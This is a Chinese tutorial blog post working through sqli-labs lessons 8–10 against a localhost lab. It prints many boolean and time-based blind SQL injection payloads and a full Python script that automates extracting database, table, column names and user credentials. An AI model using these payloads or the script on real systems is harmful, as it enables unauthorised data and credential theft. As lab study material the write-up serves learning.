sqli-lab靶场学习(三)——Less8-10(盲注、时间盲注)

news2024/12/29 12:56:43

Less8

第八关依然是先看一般状态

http://localhost/sqli-labs/Less-8/?id=1

然后用单引号闭合:

http://localhost/sqli-labs/Less-8/?id=1'

这关的问题在于报错是不显示,那没办法通过上篇文章的updatexml大法处理。对于这种情况,需要用“盲注”,说白了就是猜,例如如下:

http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

这里猜数据库第一个字幕是s,当然我们不是神,肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路,通过大于小于的方式,确定并逐步缩小区间,这样可以减少查询的次数。

我们通过这样的方式,可以顺利查出所属数据库,另外还得先查字符串的长度,确定了长度再一个一个字符盲注尝试:

http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

 一通操作下来,逐个字符对比,就能试出是security这个。同样的方法,可以找出在information_schema.tables中第四个表的表名是users:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

这里都是忽略了一个一个表,一个一个字符尝试的过程。

之后用同样的方式,盲注找出列名:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asd

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd

盲注后匹配第四和第五个列名是username和password。 

之后盲注找出用户名和密码:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asd

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd

这里用了ascii码来匹配,因为账号密码是有大小写区分,但mysql默认配置里是不区分大小写。前面数据库名、表名、列名也可以用ascii码去匹配。如果数据库本身是区分大小写的话就一定要用ascii码来匹配。

Less9

第九关难度更大了,会发现无论输入什么闭合,页面返回都一样。这代表这个页面是无论对错,返回的东西都一样。那这种情况怎么办?这里要用到“时间盲注”。时间盲注具体的做法是,如果注入判断条件正确,则sleep一段时间,如果错误就立即返回。这样通过看请求是否sleep就能判断之前的条件是否正确。而注入条件则是第八关的内容。

举个例子当我们输入:

http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1)  -- asd

浏览器左上角会转圈圈大概2秒,通过浏览器开发者工具f12

看到等待了2秒服务器才返回。这就是时间盲注。

所以可以利用同样的语句找出数据库名:

http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd

找出表名:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd

找出列名:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asd

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd

最后找出账号名密码:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(passowrd) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

除了添加了if条件和sleep之外,基本和第八关一致,效果就不另外展示了。

时间盲注脚本

一个一个手动试,除非本身知道答案,否则太费劲了,所以可以用python脚本处理

import requests
import time

db_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,
            89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,
            122]


def get_method(url_params):
    t1 = time.time()
    #print(url_params)
    r = requests.get('http://localhost/sqli-labs/Less-8', params=url_params)
    t2 = time.time()
    if t2-t1 > 2:
        return True
    return False


def check_database():
    ##数据库名长度
    database_len = 0
    for i in range(100):
        params = {'id': "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}
        if get_method(params):
            database_len = i
            print('database name length is: ' + str(database_len))
            break

    for j in range(database_len):
        for db_char in db_ascii:
            params = {'id': "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}
            if get_method(params):
                print(chr(db_char), end='')
                break

            time.sleep(0.05)
    print('')

def check_table():
    ##表数
    table_num = 0
    for i in range(100):
        num_params = {'id': "1' and if((select count(1) from information_schema.tables where table_schema=database())=" +
                    str(i) + ", sleep(2),1) -- asd"}
        if get_method(num_params):
            table_num = i
            print('table number  is: ' + str(table_num))
            break

    for k in range(table_num):
        ##表名长度
        table_name_len = 0
        for l in range(100):
            tb_len_params = {'id': "1' and if((select LENGTH(table_name) from information_schema.tables where " +
                        "table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(tb_len_params):
                table_name_len = l
                print('table name length is: ' + str(table_name_len))
                break

        ##表名
        for j in range(table_name_len):
            for tb_char in db_ascii:
                tb_name_params = {'id': "1' and if(ASCII(substr((select table_name from information_schema.tables " +
                            "where table_schema=database() limit " + str(k) + ",1), " + str(j+1) + ", 1))=" + str(tb_char) + ", " +
                            "sleep(2),1) -- asd"}
                if get_method(tb_name_params):
                    print(chr(tb_char), end='')
                    break

                time.sleep(0.05)

        print('')

def check_column(tb_name):
    ##列数
    col_num = 0
    for i in range(100):
        num_params = {'id': "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" +
                    str(i) + ", sleep(2),1) -- asd"}
        if get_method(num_params):
            col_num = i
            print('column number  is: ' + str(col_num))
            break

    for k in range(col_num):
        ##列名长度
        col_name_len = 0
        for l in range(100):
            col_len_params = {'id': "1' and if((select LENGTH(column_name) from information_schema.columns where " +
                                   "table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(col_len_params):
                col_name_len = l
                print('column name length is: ' + str(col_name_len))
                break

        ##列名
        for j in range(col_name_len):
            for col_char in db_ascii:
                col_name_params = {'id': "1' and if(ASCII(substr((select column_name from information_schema.columns " +
                            "where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" +
                            str(col_char) + ", sleep(2),1) -- asd"}
                if get_method(col_name_params):
                    print(chr(col_char), end='')
                    break

                time.sleep(0.05)

        print('')

def check_username_password(tb_name, username_col, password_col, start, end):

    for i in range(start, end):
        #用户名长度
        username_len = 0
        for j in range(100):
            username_len_params = {'id': "1' and if((select LENGTH(" + username_col + ") from " + tb_name +
                                    " limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}
            if get_method(username_len_params):
                username_len = j
                print('username length is: ' + str(j))
                break

        for k in range(username_len):
            for username_char in range(33,127):
                username_params = {'id': "1' and if(ASCII(substr((select " + username_col + " from " + tb_name +
                                    " limit " + str(i) + ",1), " + str(k+1) + ", 1))=" + str(username_char) +
                                    ", sleep(2),1) -- asd"}
                if get_method(username_params):
                    print(chr(username_char), end='')
                    break

                time.sleep(0.05)
        print('')

        # 密码长度
        password_len = 0
        for l in range(100):
            password_len_params = {'id': "1' and if((select LENGTH(" + password_col + ") from " + tb_name +
                                    " limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(password_len_params):
                password_len = l
                print('password length is: ' + str(l))
                break

        for m in range(password_len):
            for password_char in range(33,127):
                password_params = {'id': "1' and if(ASCII(substr((select " + password_col + " from " + tb_name +
                                    " limit " + str(i) + ",1), " + str(m+1) + ", 1))=" + str(password_char) +
                                    ", sleep(2),1) -- asd"}
                if get_method(password_params):
                    print(chr(password_char), end='')
                    break

                time.sleep(0.05)
        print('')


if __name__ == '__main__':
    check_database()
    check_table()
    #check_column('users')
    #check_username_password('users', 'username', 'password', 0, 2)

写了一个穷举式的,读者感兴趣可以写个二分查找会更快。其中查列名和用户名密码的函数需要在前面的函数中获取到表名和列名,才能作为传参。

Less10

第十关和第九关除了闭合区间变成双引号外,其余一致,就不另外写了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2156047.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【C++笔记】C++编译器拷贝优化和内存管理

【C笔记】C编译器拷贝优化和内存管理 🔥个人主页:大白的编程日记 🔥专栏:C笔记 文章目录 【C笔记】C编译器拷贝优化和内存管理前言一.对象拷贝时的编译器优化二.C/C内存管理2.1练习2.2 C内存管理方式2.3 operator new与operator…

线程池动态设置线程大小踩坑

在配置线程池核心线程数大小和最大线程数大小后,如果调用线程池setCorePoolSize方法来调整线程池中核心线程的大小,需要特别注意,可能踩坑,说不定增加了线程让你的程序性能更差。 ThreadPoolExecutor有提供一个动态变更线程池核心…

.bixi勒索病毒数据恢复|金蝶、用友、管家婆、OA、速达、ERP等软件数据库恢复

导言 在当今数字化时代,勒索软件已成为企业和个人面临的重大安全威胁。.bixi勒索病毒作为其中一种新型恶意软件,以其快速加密文件的能力和高效传播机制引发了广泛关注。该病毒不仅能够迅速锁定用户的关键数据,还常常在感染后施加极大的心理压…

【devops】devops-ansible之介绍和基础使用

本站以分享各种运维经验和运维所需要的技能为主 《python零基础入门》:python零基础入门学习 《python运维脚本》: python运维脚本实践 《shell》:shell学习 《terraform》持续更新中:terraform_Aws学习零基础入门到最佳实战 《k8…

微信公众号文章自动化排版实现思路

文章目录 一、前言1.1 个人写作的痛点1.2 自动化排版工具实现的功能 二、我的文章创作与发布流程三、公众号文章自动化排版实现思路3.1 Typora软件展示3.2 96微信公众号排版平台展示3.3 自动化排版实现思路3.3.1 先构建一个空的文章html模版3.3.2 读取md文章,对内容…

大学生请码住!分享10款AI论文工具搞定论文开题到答辩全过程!

在当今学术研究和论文写作领域,AI工具的出现极大地提高了写作效率和质量。对于大学生来说,这些工具不仅能够帮助他们快速生成高质量的论文初稿,还能进行内容优化、查重和排版等操作。以下是10款值得推荐的AI论文工具,其中特别推荐…

STL-set/multiset关联式容器

目录 一、常见接口 1.0 迭代器 1.1 构造函数 1.2 增删查 1.3 查找和统计 二、multiset 2.1 构造 2.2 查找 2.3 删除 2.4 统计 关联式容器是⽤来存储数据的,与序列式容器不同的是,关联式容器逻辑结构通常是⾮线性结构,两个位置有紧密…

社交电商中“信任”基础与“链动 2+1 模式 O2O 商城小程序”的价值探索

摘要:本文深入探讨了在基于社交的商业模式中,“信任”作为重要基础条件的关键作用。详细分析了在产品同质化日益严重的当下,人与人之间口口相传的宣传方式优势。同时,全面引入“链动 21 模式 O2O 商城小程序”,深入阐述…

Java面试篇-AOP专题(什么是AOP、AOP的几个核心概念、AOP的常用场景、使用AOP记录操作日志、Spring中的事务是如何实现的)

文章目录 1. 什么是AOP2. AOP的几个核心概念3. AOP的常用场景4. 使用AOP记录操作日志4.1 准备工作4.1.1 引入Maven依赖4.1.2 UserController.java4.1.3 User.java4.1.4 UserService.java 4.2 具体实现(以根据id查询用户信息为例)4.2.1 定义切面类&#x…

整合多方大佬博客以及视频 一文读懂 servlet

参考文章以及视频 文章: 都2023年了,Servlet还有必要学习吗?一文带你快速了解Servlet_servlet用得多吗-CSDN博客 【计算机网络】HTTP 协议详解_3.简述浏览器请求一个网址的过程中用到的网络协议,以及协议的用途(写关键点即可)-CSDN博客 【…

[数据结构]无头单向非循环链表的实现与应用

文章目录 一、引言二、线性表的基本概念1、线性表是什么2、链表与顺序表的区别3、无头单向非循环链表 三、无头单向非循环链表的实现1、结构体定义2、初始化3、销毁4、显示5、增删查改 四、分析无头单向非循环链表1、存储方式2、优点3、缺点 五、总结1、练习题2、源代码 一、引…

Mysql----索引与事务

1.索引 1.1什么是MYSQL的索引 MySQL官方对于索引的定义:索引是帮助Mysql高效获取数据的数据结构 Mysql在存储数据之外,数据库系统中还维护着满足特定查找算法的数据结构,这些数据结构以某种引用(指向)表中的数据&…

萤石云平台接入SVMSPro平台

萤石云平台接入SVMSPro平台 步骤一:进入萤石云官网:https://open.ys7.com/ ,点右上角的登陆,填写自己的用户名密码; 步骤二:登陆进去后,开发者服务—>我的账号—>应用信息,在…

电气自动化入门07:开关电源、三相异步电动机多地与顺序控制电路

视频链接:3.5 电工知识:三相交流异步电动机多地与顺序控制及开关电源选型_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1PJ41117PW?p9&vd_sourceb5775c3a4ea16a5306db9c7c1c1486b5 1.开关电源功能与选型说明: 2.三相异步电动机…

数据结构与算法之间有何关系?

相信很多人都应该上个《数据结构与算法》这门课吧,而这两个概念也如孪生兄弟一样经常被拿出来一起讨论。那它们究竟是一个什么样子的关系呢? 听到数据结构与算法我第一反应是想到了Pascal 语言之父尼古拉斯沃斯在他的《Algorithms Data Structures Pro…

esp32s3分区表配置及读写

一、分区表介绍 每片 ESP32-S3 的 flash 可以包含多个应用程序,以及多种不同类型的数据(例如校准数据、文件系统数据、参数存储数据等)。因此,在 flash 的 默认偏移地址 0x8000 处烧写一张分区表。 分区表中的每个条目都包括以下…

【d47】【Java】【力扣】997.找到小镇的法官

思路 记录入度和出度 一个人可以连接多个,一个人也可以被多个人连接,就是图的性质 一个人可以信任多人,一个人也可以被多个人信任 统计入度出度, 法官:入度n-1,出度0 其他人:因为被所有其他人信任的 只能…

JS执行机制(同步和异步)

JavaScript语言的一大特点就是单线程,也就是说,同一个时间只能做一件事。 异步:在做这件事的同时,你还可以去处理其他事 他们的本质区别:这条流水线上各个流程的执行顺序不同。 同步任务 同步任务都在主线程上执行,形成一个执行栈。 异步…

7、论等保的必要性

数据来源:7.论等保的必要性_哔哩哔哩_bilibili 等级保护必要性 降低信息安全风险 等级保护旨在降低信息安全风险,提高信息系统的安全防护能力。 风险发现与整改 开展等级保护的最重要原因是通过测评工作,发现单位系统内外部的安全风险和脆弱…

【计网】从零开始掌握序列化 --- JSON实现协议 + 设计 传输\会话\应用 三层结构

唯有梦想才配让你不安, 唯有行动才能解除你的不安。 --- 卢思浩 --- 从零开始掌握序列化 1 知识回顾2 序列化与编写协议2.1 使用Json进行序列化2.2 编写协议 3 封装IOService4 应用层 --- 网络计算器5 总结 1 知识回顾 上一篇文章我们讲解了协议的本质是双方能够…